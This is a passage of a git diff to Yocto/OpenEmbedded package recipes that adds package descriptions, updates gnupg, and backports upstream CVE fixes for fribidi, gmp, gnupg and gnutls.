29 status = true;
30 goto out;
diff --git a/meta/recipes-support/fribidi/fribidi_1.0.9.bb b/meta/recipes-support/fribidi/fribidi_1.0.9.bb
index 0654b07dc7..62b7d72812 100644
--- a/meta/recipes-support/fribidi/fribidi_1.0.9.bb
+++ b/meta/recipes-support/fribidi/fribidi_1.0.9.bb
@@ -1,9 +1,18 @@
1SUMMARY = "Free Implementation of the Unicode Bidirectional Algorithm" 1SUMMARY = "Free Implementation of the Unicode Bidirectional Algorithm"
2DESCRIPTION = "It provides utility functions to aid in the development \
3of interactive editors and widgets that implement BiDi functionality. \
4The BiDi algorithm is a prerequisite for supporting right-to-left scripts such \
5as Hebrew, Arabic, Syriac, and Thaana. "
2SECTION = "libs" 6SECTION = "libs"
7HOMEPAGE = "http://fribidi.org/"
8BUGTRACKER = "https://github.com/fribidi/fribidi/issues"
3LICENSE = "LGPLv2.1+" 9LICENSE = "LGPLv2.1+"
4LIC_FILES_CHKSUM = "file://COPYING;md5=a916467b91076e631dd8edb7424769c7" 10LIC_FILES_CHKSUM = "file://COPYING;md5=a916467b91076e631dd8edb7424769c7"
5 11
6SRC_URI = "https://github.com/${BPN}/${BPN}/releases/download/v${PV}/${BP}.tar.xz \ 12SRC_URI = "https://github.com/${BPN}/${BPN}/releases/download/v${PV}/${BP}.tar.xz \
13 file://CVE-2022-25308.patch \
14 file://CVE-2022-25309.patch \
15 file://CVE-2022-25310.patch \
7 " 16 "
8SRC_URI[md5sum] = "1b767c259c3cd8e0c8496970f63c22dc" 17SRC_URI[md5sum] = "1b767c259c3cd8e0c8496970f63c22dc"
9SRC_URI[sha256sum] = "c5e47ea9026fb60da1944da9888b4e0a18854a0e2410bbfe7ad90a054d36e0c7" 18SRC_URI[sha256sum] = "c5e47ea9026fb60da1944da9888b4e0a18854a0e2410bbfe7ad90a054d36e0c7"
diff --git a/meta/recipes-support/gdbm/gdbm_1.18.1.bb b/meta/recipes-support/gdbm/gdbm_1.18.1.bb
index fbb1fe72d7..bfc9ee8f85 100644
--- a/meta/recipes-support/gdbm/gdbm_1.18.1.bb
+++ b/meta/recipes-support/gdbm/gdbm_1.18.1.bb
@@ -1,4 +1,7 @@
1SUMMARY = "Key/value database library with extensible hashing" 1SUMMARY = "Key/value database library with extensible hashing"
2DESCRIPTION = "Library of database functions that use extensible hashing \
3and work similar to the standard UNIX dbm. These routines are provided \
4to a programmer needing to create and manipulate a hashed database."
2HOMEPAGE = "http://www.gnu.org/software/gdbm/" 5HOMEPAGE = "http://www.gnu.org/software/gdbm/"
3SECTION = "libs" 6SECTION = "libs"
4LICENSE = "GPLv3" 7LICENSE = "GPLv3"
diff --git a/meta/recipes-support/gmp/gmp/cve-2021-43618.patch b/meta/recipes-support/gmp/gmp/cve-2021-43618.patch
new file mode 100644
index 0000000000..095fb21eaa
--- /dev/null
+++ b/meta/recipes-support/gmp/gmp/cve-2021-43618.patch
@@ -0,0 +1,27 @@
1CVE: CVE-2021-43618
2Upstream-Status: Backport
3Signed-off-by: Ross Burton <ross.burton@arm.com>
4
5# HG changeset patch
6# User Marco Bodrato <bodrato@mail.dm.unipi.it>
7# Date 1634836009 -7200
8# Node ID 561a9c25298e17bb01896801ff353546c6923dbd
9# Parent e1fd9db13b475209a864577237ea4b9105b3e96e
10mpz/inp_raw.c: Avoid bit size overflows
11
12diff -r e1fd9db13b47 -r 561a9c25298e mpz/inp_raw.c
13--- a/mpz/inp_raw.c Tue Dec 22 23:49:51 2020 +0100
14+++ b/mpz/inp_raw.c Thu Oct 21 19:06:49 2021 +0200
15@@ -88,8 +88,11 @@
16
17 abs_csize = ABS (csize);
18
19+ if (UNLIKELY (abs_csize > ~(mp_bitcnt_t) 0 / 8))
20+ return 0; /* Bit size overflows */
21+
22 /* round up to a multiple of limbs */
23- abs_xsize = BITS_TO_LIMBS (abs_csize*8);
24+ abs_xsize = BITS_TO_LIMBS ((mp_bitcnt_t) abs_csize * 8);
25
26 if (abs_xsize != 0)
27 {
diff --git a/meta/recipes-support/gmp/gmp_6.2.0.bb b/meta/recipes-support/gmp/gmp_6.2.0.bb
index a19c74fca8..d29b74f829 100644
--- a/meta/recipes-support/gmp/gmp_6.2.0.bb
+++ b/meta/recipes-support/gmp/gmp_6.2.0.bb
@@ -12,6 +12,7 @@ SRC_URI = "https://gmplib.org/download/${BPN}/${BP}${REVISION}.tar.bz2 \
12 file://use-includedir.patch \ 12 file://use-includedir.patch \
13 file://0001-Append-the-user-provided-flags-to-the-auto-detected-.patch \ 13 file://0001-Append-the-user-provided-flags-to-the-auto-detected-.patch \
14 file://0001-confiure.ac-Believe-the-cflags-from-environment.patch \ 14 file://0001-confiure.ac-Believe-the-cflags-from-environment.patch \
15 file://cve-2021-43618.patch \
15 " 16 "
16SRC_URI[md5sum] = "c24161e0dd44cae78cd5f67193492a21" 17SRC_URI[md5sum] = "c24161e0dd44cae78cd5f67193492a21"
17SRC_URI[sha256sum] = "f51c99cb114deb21a60075ffb494c1a210eb9d7cb729ed042ddb7de9534451ea" 18SRC_URI[sha256sum] = "f51c99cb114deb21a60075ffb494c1a210eb9d7cb729ed042ddb7de9534451ea"
diff --git a/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb b/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb
index 0defebeb15..19f32e8d1f 100644
--- a/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb
+++ b/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb
@@ -1,11 +1,15 @@
1SUMMARY = "Test runner for GNOME-style installed tests" 1SUMMARY = "Test runner for GNOME-style installed tests"
2DESCRIPTION = "Runner provides an execution harness for GNOME installed tests. \
3These tests are useful for verifying the functionality of software as \
4installed and packaged, and complement rather than replace build-time \
5('make check') tests."
2HOMEPAGE = "https://wiki.gnome.org/GnomeGoals/InstalledTests" 6HOMEPAGE = "https://wiki.gnome.org/GnomeGoals/InstalledTests"
3LICENSE = "LGPLv2+" 7LICENSE = "LGPLv2+"
4 8
5LIC_FILES_CHKSUM = "file://COPYING;md5=3bf50002aefd002f49e7bb854063f7e7 \ 9LIC_FILES_CHKSUM = "file://COPYING;md5=3bf50002aefd002f49e7bb854063f7e7 \
6 file://src/gnome-desktop-testing-runner.c;beginline=1;endline=20;md5=7ef3ad9da2ffcf7707dc11151fe007f4" 10 file://src/gnome-desktop-testing-runner.c;beginline=1;endline=20;md5=7ef3ad9da2ffcf7707dc11151fe007f4"
7 11
8SRC_URI = "git://gitlab.gnome.org/GNOME/gnome-desktop-testing.git;protocol=http" 12SRC_URI = "git://gitlab.gnome.org/GNOME/gnome-desktop-testing.git;protocol=http;branch=master"
9SRCREV = "4decade67b29ad170fcf3de148e41695fc459f48" 13SRCREV = "4decade67b29ad170fcf3de148e41695fc459f48"
10 14
11DEPENDS = "glib-2.0" 15DEPENDS = "glib-2.0"
diff --git a/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch b/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch
index 2c204e0245..a0af2d48dc 100644
--- a/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch
+++ b/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch
@@ -1,4 +1,4 @@
1From e7ad11cf54475e455fdb84d118e4782961698567 Mon Sep 17 00:00:00 2001 1From abc5c396aaddaef2e6811362e3e0cc0da28c2b34 Mon Sep 17 00:00:00 2001
2From: Alexander Kanavin <alex.kanavin@gmail.com> 2From: Alexander Kanavin <alex.kanavin@gmail.com>
3Date: Mon, 22 Jan 2018 18:00:21 +0200 3Date: Mon, 22 Jan 2018 18:00:21 +0200
4Subject: [PATCH] configure.ac: use a custom value for the location of 4Subject: [PATCH] configure.ac: use a custom value for the location of
@@ -14,10 +14,10 @@ Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
14 1 file changed, 1 insertion(+), 1 deletion(-) 14 1 file changed, 1 insertion(+), 1 deletion(-)
15 15
16diff --git a/configure.ac b/configure.ac 16diff --git a/configure.ac b/configure.ac
17index 919ab31..cd58fdb 100644 17index 64cb8c6..3fe9027 100644
18--- a/configure.ac 18--- a/configure.ac
19+++ b/configure.ac 19+++ b/configure.ac
20@@ -1855,7 +1855,7 @@ AC_DEFINE_UNQUOTED(GPGCONF_DISP_NAME, "GPGConf", 20@@ -1824,7 +1824,7 @@ AC_DEFINE_UNQUOTED(GPGCONF_DISP_NAME, "GPGConf",
21 21
22 AC_DEFINE_UNQUOTED(GPGTAR_NAME, "gpgtar", [The name of the gpgtar tool]) 22 AC_DEFINE_UNQUOTED(GPGTAR_NAME, "gpgtar", [The name of the gpgtar tool])
23 23
diff --git a/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch b/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch
index 3e798efd06..a13b4d5fb5 100644
--- a/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch
+++ b/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch
@@ -1,7 +1,7 @@
1From 9c3858ffda6246bf9e1e6aeeb920532a56b19408 Mon Sep 17 00:00:00 2001 1From 6c75656b68cb6e38b039ae532bd39437cd6daec5 Mon Sep 17 00:00:00 2001
2From: Saul Wold <sgw@linux.intel.com> 2From: Saul Wold <sgw@linux.intel.com>
3Date: Wed, 16 Aug 2017 11:18:01 +0800 3Date: Wed, 16 Aug 2017 11:18:01 +0800
4Subject: [PATCH 3/4] dirmngr uses libgpg error 4Subject: [PATCH] dirmngr uses libgpg error
5 5
6Upstream-Status: Pending 6Upstream-Status: Pending
7Signed-off-by: Saul Wold <sgw@linux.intel.com> 7Signed-off-by: Saul Wold <sgw@linux.intel.com>
@@ -9,24 +9,20 @@ Signed-off-by: Saul Wold <sgw@linux.intel.com>
9Rebase to 2.1.23 9Rebase to 2.1.23
10 10
11Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com> 11Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
12
12--- 13---
13 dirmngr/Makefile.am | 3 ++- 14 dirmngr/Makefile.am | 1 +
14 1 file changed, 2 insertions(+), 1 deletion(-) 15 1 file changed, 1 insertion(+)
15 16
16diff --git a/dirmngr/Makefile.am b/dirmngr/Makefile.am 17diff --git a/dirmngr/Makefile.am b/dirmngr/Makefile.am
17index b404165..d3f916e 100644 18index 00d3c42..450d873 100644
18--- a/dirmngr/Makefile.am 19--- a/dirmngr/Makefile.am
19+++ b/dirmngr/Makefile.am 20+++ b/dirmngr/Makefile.am
20@@ -82,7 +82,8 @@ endif 21@@ -101,6 +101,7 @@ dirmngr_LDADD = $(libcommonpth) \
21 dirmngr_LDADD = $(libcommonpth) \
22 $(DNSLIBS) $(LIBASSUAN_LIBS) \ 22 $(DNSLIBS) $(LIBASSUAN_LIBS) \
23 $(LIBGCRYPT_LIBS) $(KSBA_LIBS) $(NPTH_LIBS) \ 23 $(LIBGCRYPT_LIBS) $(KSBA_LIBS) $(NPTH_LIBS) \
24- $(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV) 24 $(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV) $(NETLIBS) \
25+ $(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV) \ 25+ $(GPG_ERROR_LIBS) \
26+ $(GPG_ERROR_LIBS) 26 $(dirmngr_robj)
27 if USE_LDAP 27 if USE_LDAP
28 dirmngr_LDADD += $(ldaplibs) 28 dirmngr_LDADD += $(ldaplibs)
29 endif
30--
311.8.3.1
32
diff --git a/meta/recipes-support/gnupg/gnupg/CVE-2022-34903.patch b/meta/recipes-support/gnupg/gnupg/CVE-2022-34903.patch
new file mode 100644
index 0000000000..5992949d35
--- /dev/null
+++ b/meta/recipes-support/gnupg/gnupg/CVE-2022-34903.patch
@@ -0,0 +1,44 @@
1From 2f05fc96b1332caf97176841b1152da3f0aa16a8 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Fri, 22 Jul 2022 17:52:36 +0530
4Subject: [PATCH] CVE-2022-34903
5
6Upstream-Status: Backport [https://git.gnupg.org/cgi-bin/gitweb.cgi?p=gnupg.git;a=commit;h=34c649b3601383cd11dbc76221747ec16fd68e1b]
7CVE: CVE-2022-34903
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 g10/cpr.c | 13 ++++---------
11 1 file changed, 4 insertions(+), 9 deletions(-)
12
13diff --git a/g10/cpr.c b/g10/cpr.c
14index d502e8b..bc4b715 100644
15--- a/g10/cpr.c
16+++ b/g10/cpr.c
17@@ -328,20 +328,15 @@ write_status_text_and_buffer (int no, const char *string,
18 }
19 first = 0;
20 }
21- for (esc=0, s=buffer, n=len; n && !esc; s++, n--)
22+ for (esc=0, s=buffer, n=len; n; s++, n--)
23 {
24 if (*s == '%' || *(const byte*)s <= lower_limit
25 || *(const byte*)s == 127 )
26 esc = 1;
27 if (wrap && ++count > wrap)
28- {
29- dowrap=1;
30- break;
31- }
32- }
33- if (esc)
34- {
35- s--; n++;
36+ dowrap=1;
37+ if (esc || dowrap)
38+ break;
39 }
40 if (s != buffer)
41 es_fwrite (buffer, s-buffer, 1, statusfp);
42--
432.25.1
44
diff --git a/meta/recipes-support/gnupg/gnupg/relocate.patch b/meta/recipes-support/gnupg/gnupg/relocate.patch
index e5a82aa76d..7f7812cd46 100644
--- a/meta/recipes-support/gnupg/gnupg/relocate.patch
+++ b/meta/recipes-support/gnupg/gnupg/relocate.patch
@@ -1,4 +1,4 @@
1From 59c077f32e81190955910cae02599c7a3edfa7fb Mon Sep 17 00:00:00 2001 1From bd66af2ac7bb6d9294ac8055a55462ba7c4f9c9b Mon Sep 17 00:00:00 2001
2From: Ross Burton <ross.burton@intel.com> 2From: Ross Burton <ross.burton@intel.com>
3Date: Wed, 19 Sep 2018 14:44:40 +0100 3Date: Wed, 19 Sep 2018 14:44:40 +0100
4Subject: [PATCH] Allow the environment to override where gnupg looks for its 4Subject: [PATCH] Allow the environment to override where gnupg looks for its
@@ -12,10 +12,10 @@ Signed-off-by: Ross Burton <ross.burton@intel.com>
12 1 file changed, 8 insertions(+), 8 deletions(-) 12 1 file changed, 8 insertions(+), 8 deletions(-)
13 13
14diff --git a/common/homedir.c b/common/homedir.c 14diff --git a/common/homedir.c b/common/homedir.c
15index e9e75d0..19140aa 100644 15index 4b6e46e..58989b4 100644
16--- a/common/homedir.c 16--- a/common/homedir.c
17+++ b/common/homedir.c 17+++ b/common/homedir.c
18@@ -760,7 +760,7 @@ gnupg_socketdir (void) 18@@ -763,7 +763,7 @@ gnupg_socketdir (void)
19 if (!name) 19 if (!name)
20 { 20 {
21 unsigned int dummy; 21 unsigned int dummy;
@@ -24,7 +24,7 @@ index e9e75d0..19140aa 100644
24 } 24 }
25 25
26 return name; 26 return name;
27@@ -786,7 +786,7 @@ gnupg_sysconfdir (void) 27@@ -789,7 +789,7 @@ gnupg_sysconfdir (void)
28 } 28 }
29 return name; 29 return name;
30 #else /*!HAVE_W32_SYSTEM*/ 30 #else /*!HAVE_W32_SYSTEM*/
@@ -33,7 +33,7 @@ index e9e75d0..19140aa 100644
33 #endif /*!HAVE_W32_SYSTEM*/ 33 #endif /*!HAVE_W32_SYSTEM*/
34 } 34 }
35 35
36@@ -815,7 +815,7 @@ gnupg_bindir (void) 36@@ -818,7 +818,7 @@ gnupg_bindir (void)
37 else 37 else
38 return rdir; 38 return rdir;
39 #else /*!HAVE_W32_SYSTEM*/ 39 #else /*!HAVE_W32_SYSTEM*/
@@ -42,7 +42,7 @@ index e9e75d0..19140aa 100644
42 #endif /*!HAVE_W32_SYSTEM*/ 42 #endif /*!HAVE_W32_SYSTEM*/
43 } 43 }
44 44
45@@ -828,7 +828,7 @@ gnupg_libexecdir (void) 45@@ -831,7 +831,7 @@ gnupg_libexecdir (void)
46 #ifdef HAVE_W32_SYSTEM 46 #ifdef HAVE_W32_SYSTEM
47 return gnupg_bindir (); 47 return gnupg_bindir ();
48 #else /*!HAVE_W32_SYSTEM*/ 48 #else /*!HAVE_W32_SYSTEM*/
@@ -51,7 +51,7 @@ index e9e75d0..19140aa 100644
51 #endif /*!HAVE_W32_SYSTEM*/ 51 #endif /*!HAVE_W32_SYSTEM*/
52 } 52 }
53 53
54@@ -842,7 +842,7 @@ gnupg_libdir (void) 54@@ -845,7 +845,7 @@ gnupg_libdir (void)
55 name = xstrconcat (w32_rootdir (), DIRSEP_S "lib" DIRSEP_S "gnupg", NULL); 55 name = xstrconcat (w32_rootdir (), DIRSEP_S "lib" DIRSEP_S "gnupg", NULL);
56 return name; 56 return name;
57 #else /*!HAVE_W32_SYSTEM*/ 57 #else /*!HAVE_W32_SYSTEM*/
@@ -60,7 +60,7 @@ index e9e75d0..19140aa 100644
60 #endif /*!HAVE_W32_SYSTEM*/ 60 #endif /*!HAVE_W32_SYSTEM*/
61 } 61 }
62 62
63@@ -856,7 +856,7 @@ gnupg_datadir (void) 63@@ -859,7 +859,7 @@ gnupg_datadir (void)
64 name = xstrconcat (w32_rootdir (), DIRSEP_S "share" DIRSEP_S "gnupg", NULL); 64 name = xstrconcat (w32_rootdir (), DIRSEP_S "share" DIRSEP_S "gnupg", NULL);
65 return name; 65 return name;
66 #else /*!HAVE_W32_SYSTEM*/ 66 #else /*!HAVE_W32_SYSTEM*/
@@ -69,7 +69,7 @@ index e9e75d0..19140aa 100644
69 #endif /*!HAVE_W32_SYSTEM*/ 69 #endif /*!HAVE_W32_SYSTEM*/
70 } 70 }
71 71
72@@ -872,7 +872,7 @@ gnupg_localedir (void) 72@@ -875,7 +875,7 @@ gnupg_localedir (void)
73 NULL); 73 NULL);
74 return name; 74 return name;
75 #else /*!HAVE_W32_SYSTEM*/ 75 #else /*!HAVE_W32_SYSTEM*/
@@ -78,7 +78,7 @@ index e9e75d0..19140aa 100644
78 #endif /*!HAVE_W32_SYSTEM*/ 78 #endif /*!HAVE_W32_SYSTEM*/
79 } 79 }
80 80
81@@ -940,7 +940,7 @@ gnupg_cachedir (void) 81@@ -943,7 +943,7 @@ gnupg_cachedir (void)
82 } 82 }
83 return dir; 83 return dir;
84 #else /*!HAVE_W32_SYSTEM*/ 84 #else /*!HAVE_W32_SYSTEM*/
diff --git a/meta/recipes-support/gnupg/gnupg_2.2.20.bb b/meta/recipes-support/gnupg/gnupg_2.2.27.bb
index f754573c88..bd09b02017 100644
--- a/meta/recipes-support/gnupg/gnupg_2.2.20.bb
+++ b/meta/recipes-support/gnupg/gnupg_2.2.27.bb
@@ -1,4 +1,9 @@
1SUMMARY = "GNU Privacy Guard - encryption and signing tools (2.x)" 1SUMMARY = "GNU Privacy Guard - encryption and signing tools (2.x)"
2DESCRIPTION = "A complete and free implementation of the OpenPGP standard \
3as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt \
4and sign your data and communications; it features a versatile key \
5management system, along with access modules for all kinds of public \
6key directories."
2HOMEPAGE = "http://www.gnupg.org/" 7HOMEPAGE = "http://www.gnupg.org/"
3LICENSE = "GPLv3 & LGPLv3" 8LICENSE = "GPLv3 & LGPLv3"
4LIC_FILES_CHKSUM = "file://COPYING;md5=189af8afca6d6075ba6c9e0aa8077626 \ 9LIC_FILES_CHKSUM = "file://COPYING;md5=189af8afca6d6075ba6c9e0aa8077626 \
@@ -15,19 +20,20 @@ SRC_URI = "${GNUPG_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \
15 file://0003-dirmngr-uses-libgpg-error.patch \ 20 file://0003-dirmngr-uses-libgpg-error.patch \
16 file://0004-autogen.sh-fix-find-version-for-beta-checking.patch \ 21 file://0004-autogen.sh-fix-find-version-for-beta-checking.patch \
17 file://0001-Woverride-init-is-not-needed-with-gcc-9.patch \ 22 file://0001-Woverride-init-is-not-needed-with-gcc-9.patch \
23 file://CVE-2022-34903.patch \
18 " 24 "
19SRC_URI_append_class-native = " file://0001-configure.ac-use-a-custom-value-for-the-location-of-.patch \ 25SRC_URI_append_class-native = " file://0001-configure.ac-use-a-custom-value-for-the-location-of-.patch \
20 file://relocate.patch" 26 file://relocate.patch"
21SRC_URI_append_class-nativesdk = " file://relocate.patch" 27SRC_URI_append_class-nativesdk = " file://relocate.patch"
22 28
23SRC_URI[md5sum] = "4ff88920cf52b35db0dedaee87bdbbb1" 29SRC_URI[sha256sum] = "34e60009014ea16402069136e0a5f63d9b65f90096244975db5cea74b3d02399"
24SRC_URI[sha256sum] = "04a7c9d48b74c399168ee8270e548588ddbe52218c337703d7f06373d326ca30"
25 30
26EXTRA_OECONF = "--disable-ldap \ 31EXTRA_OECONF = "--disable-ldap \
27 --disable-ccid-driver \ 32 --disable-ccid-driver \
28 --with-zlib=${STAGING_LIBDIR}/.. \ 33 --with-zlib=${STAGING_LIBDIR}/.. \
29 --with-bzip2=${STAGING_LIBDIR}/.. \ 34 --with-bzip2=${STAGING_LIBDIR}/.. \
30 --with-readline=${STAGING_LIBDIR}/.. \ 35 --with-readline=${STAGING_LIBDIR}/.. \
36 --with-mailprog=${sbindir}/sendmail \
31 --enable-gpg-is-gpg2 \ 37 --enable-gpg-is-gpg2 \
32 " 38 "
33 39
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2021-20231.patch b/meta/recipes-support/gnutls/gnutls/CVE-2021-20231.patch
new file mode 100644
index 0000000000..6fe7a21e33
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2021-20231.patch
@@ -0,0 +1,67 @@
1From 15beb4b193b2714d88107e7dffca781798684e7e Mon Sep 17 00:00:00 2001
2From: Daiki Ueno <ueno@gnu.org>
3Date: Fri, 29 Jan 2021 14:06:32 +0100
4Subject: [PATCH] key_share: avoid use-after-free around realloc
5
6Signed-off-by: Daiki Ueno <ueno@gnu.org>
7
8https://gitlab.com/gnutls/gnutls/-/commit/15beb4b193b2714d88107e7dffca781798684e7e
9Upstream-Status: Backport
10CVE: CVE-2021-CVE-2021-20231
11Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
12---
13 lib/ext/key_share.c | 12 +++++-------
14 1 file changed, 5 insertions(+), 7 deletions(-)
15
16diff --git a/lib/ext/key_share.c b/lib/ext/key_share.c
17index ab8abf8fe6..a8c4bb5cff 100644
18--- a/lib/ext/key_share.c
19+++ b/lib/ext/key_share.c
20@@ -664,14 +664,14 @@ key_share_send_params(gnutls_session_t session,
21 {
22 unsigned i;
23 int ret;
24- unsigned char *lengthp;
25- unsigned int cur_length;
26 unsigned int generated = 0;
27 const gnutls_group_entry_st *group;
28 const version_entry_st *ver;
29
30 /* this extension is only being sent on client side */
31 if (session->security_parameters.entity == GNUTLS_CLIENT) {
32+ unsigned int length_pos;
33+
34 ver = _gnutls_version_max(session);
35 if (unlikely(ver == NULL || ver->key_shares == 0))
36 return 0;
37@@ -679,16 +679,13 @@ key_share_send_params(gnutls_session_t session,
38 if (!have_creds_for_tls13(session))
39 return 0;
40
41- /* write the total length later */
42- lengthp = &extdata->data[extdata->length];
43+ length_pos = extdata->length;
44
45 ret =
46 _gnutls_buffer_append_prefix(extdata, 16, 0);
47 if (ret < 0)
48 return gnutls_assert_val(ret);
49
50- cur_length = extdata->length;
51-
52 if (session->internals.hsk_flags & HSK_HRR_RECEIVED) { /* we know the group */
53 group = get_group(session);
54 if (unlikely(group == NULL))
55@@ -736,7 +733,8 @@ key_share_send_params(gnutls_session_t session,
56 }
57
58 /* copy actual length */
59- _gnutls_write_uint16(extdata->length - cur_length, lengthp);
60+ _gnutls_write_uint16(extdata->length - length_pos - 2,
61+ &extdata->data[length_pos]);
62
63 } else { /* server */
64 ver = get_version(session);
65--
66GitLab
67
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2021-20232.patch b/meta/recipes-support/gnutls/gnutls/CVE-2021-20232.patch
new file mode 100644
index 0000000000..e13917cddb
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2021-20232.patch
@@ -0,0 +1,65 @@
1From 75a937d97f4fefc6f9b08e3791f151445f551cb3 Mon Sep 17 00:00:00 2001
2From: Daiki Ueno <ueno@gnu.org>
3Date: Fri, 29 Jan 2021 14:06:50 +0100
4Subject: [PATCH] pre_shared_key: avoid use-after-free around realloc
5
6Signed-off-by: Daiki Ueno <ueno@gnu.org>
7
8https://gitlab.com/gnutls/gnutls/-/commit/75a937d97f4fefc6f9b08e3791f151445f551cb3
9Upstream-Status: Backport
10CVE: CVE-2021-CVE-2021-20232
11Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
12---
13 lib/ext/pre_shared_key.c | 15 ++++++++++++---
14 1 file changed, 12 insertions(+), 3 deletions(-)
15
16diff --git a/lib/ext/pre_shared_key.c b/lib/ext/pre_shared_key.c
17index a042c6488e..380bf39ed5 100644
18--- a/lib/ext/pre_shared_key.c
19+++ b/lib/ext/pre_shared_key.c
20@@ -267,7 +267,7 @@ client_send_params(gnutls_session_t session,
21 size_t spos;
22 gnutls_datum_t username = {NULL, 0};
23 gnutls_datum_t user_key = {NULL, 0}, rkey = {NULL, 0};
24- gnutls_datum_t client_hello;
25+ unsigned client_hello_len;
26 unsigned next_idx;
27 const mac_entry_st *prf_res = NULL;
28 const mac_entry_st *prf_psk = NULL;
29@@ -428,8 +428,7 @@ client_send_params(gnutls_session_t session,
30 assert(extdata->length >= sizeof(mbuffer_st));
31 assert(ext_offset >= (ssize_t)sizeof(mbuffer_st));
32 ext_offset -= sizeof(mbuffer_st);
33- client_hello.data = extdata->data+sizeof(mbuffer_st);
34- client_hello.size = extdata->length-sizeof(mbuffer_st);
35+ client_hello_len = extdata->length-sizeof(mbuffer_st);
36
37 next_idx = 0;
38
39@@ -440,6 +439,11 @@ client_send_params(gnutls_session_t session,
40 }
41
42 if (prf_res && rkey.size > 0) {
43+ gnutls_datum_t client_hello;
44+
45+ client_hello.data = extdata->data+sizeof(mbuffer_st);
46+ client_hello.size = client_hello_len;
47+
48 ret = compute_psk_binder(session, prf_res,
49 binders_len, binders_pos,
50 ext_offset, &rkey, &client_hello, 1,
51@@ -474,6 +478,11 @@ client_send_params(gnutls_session_t session,
52 }
53
54 if (prf_psk && user_key.size > 0 && info) {
55+ gnutls_datum_t client_hello;
56+
57+ client_hello.data = extdata->data+sizeof(mbuffer_st);
58+ client_hello.size = client_hello_len;
59+
60 ret = compute_psk_binder(session, prf_psk,
61 binders_len, binders_pos,
62 ext_offset, &user_key, &client_hello, 0,
63--
64GitLab
65
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2021-4209.patch b/meta/recipes-support/gnutls/gnutls/CVE-2021-4209.patch
new file mode 100644
index 0000000000..0bcb55e573
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2021-4209.patch
@@ -0,0 +1,37 @@
1From 3db352734472d851318944db13be73da61300568 Mon Sep 17 00:00:00 2001
2From: Daiki Ueno <ueno@gnu.org>
3Date: Wed, 22 Dec 2021 09:12:25 +0100
4Subject: [PATCH] wrap_nettle_hash_fast: avoid calling _update with zero-length
5 input
6
7As Nettle's hash update functions internally call memcpy, providing
8zero-length input may cause undefined behavior.
9
10Signed-off-by: Daiki Ueno <ueno@gnu.org>
11
12https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568
13Upstream-Status: Backport
14CVE: CVE-2021-4209
15Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
16---
17 lib/nettle/mac.c | 4 +++-
18 1 file changed, 3 insertions(+), 1 deletion(-)
19
20diff --git a/lib/nettle/mac.c b/lib/nettle/mac.c
21index f9d4d7a8df..35e070fab0 100644
22--- a/lib/nettle/mac.c
23+++ b/lib/nettle/mac.c
24@@ -788,7 +788,9 @@ static int wrap_nettle_hash_fast(gnutls_digest_algorithm_t algo,
25 if (ret < 0)
26 return gnutls_assert_val(ret);
27
28- ctx.update(&ctx, text_size, text);
29+ if (text_size > 0) {
30+ ctx.update(&ctx, text_size, text);
31+ }
32 ctx.digest(&ctx, ctx.length, digest);
33
34 return 0;
35--
36GitLab
37
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2022-2509.patch b/meta/recipes-support/gnutls/gnutls/CVE-2022-2509.patch
new file mode 100644
index 0000000000..f8954945d0
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2022-2509.patch
@@ -0,0 +1,282 @@
1From 9835638d4e1f37781a47e777c76d5bb14218929b Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Tue, 16 Aug 2022 12:23:14 +0530
4Subject: [PATCH] CVE-2022-2509
5
6Upstream-Status: Backport [https://gitlab.com/gnutls/gnutls/-/commit/ce37f9eb265dbe9b6d597f5767449e8ee95848e2]
7CVE: CVE-2022-2509
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 NEWS | 4 +
11 lib/x509/pkcs7.c | 3 +-
12 tests/Makefile.am | 2 +-
13 tests/pkcs7-verify-double-free.c | 215 +++++++++++++++++++++++++++++++
14 4 files changed, 222 insertions(+), 2 deletions(-)
15 create mode 100644 tests/pkcs7-verify-double-free.c
16
17diff --git a/NEWS b/NEWS
18index 755a67c..ba70bb3 100644
19--- a/NEWS
20+++ b/NEWS
21@@ -7,6 +7,10 @@ See the end for copying conditions.
22
23 * Version 3.6.14 (released 2020-06-03)
24
25+** libgnutls: Fixed double free during verification of pkcs7 signatures.
